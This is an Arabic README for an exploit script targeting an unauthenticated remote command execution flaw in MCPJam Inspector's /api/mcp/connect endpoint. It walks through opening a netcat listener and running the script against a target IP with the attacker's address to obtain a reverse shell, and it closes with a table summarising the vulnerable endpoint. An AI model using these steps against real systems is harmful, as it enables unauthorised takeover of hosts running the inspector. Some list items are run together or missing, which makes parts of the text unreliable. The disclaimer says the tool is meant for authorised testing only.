
تم إنشاء هذه الأداة أثناء بحث يتضمن MCPJam v1.4.2. يعرض التطبيق نقطة نهاية API تقبل كائن تكوين الخادم. في ظل ظروف معينة، قد يؤدي عدم كفاية التحقق إلى تنفيذ أوامر غير مقصودة.
يحتوي MCPJam Inspector على ثغرة تنفيذ أوامر عن بعد (RCE) بدون مصادقة في نقطة النهاية /api/mcp/connect. تسمح الثغرة للمهاجمين بتنفيذ أوامر عشوائية عن طريق إرسال حمولة ضارة لتكوين خادم MCP.
تقبل نقطة النهاية حمولة JSON تحتوي على كائن serverConfig يحتوي على مصفوفة command و args، والتي يتم تنفيذها مباشرة على النظام دون تحقق أو تعقيم مناسب.
requests: pip install requestsnetcat أو socat للمستمعالمحطة 1 - تشغيل المستمع:
nc -lvnp 4444
المحطة 2 - تشغيل الاستغلال:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# الوضع الافتراضي (المنفذ 6274، منفذ الاتصال 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# منفذ MCPJam مخصص
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# منفذ مستمع مخصص
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect⚠️ إخلاء المسؤولية:
يتم توفير هذا الاستغلال للأغراض التعليمية واختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المستخدمون مسؤولون وحدهم عن:
لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة. استخدم على مسؤوليتك الخاصة.
| المكون | القيمة |
|---|---|
| نقطة النهاية الضعيفة | /api/mcp/connect |
| الطريقة | POST |
| المصادقة | غير مطلوبة |
| التأثير | تنفيذ أوامر عن بعد بدون مصادقة |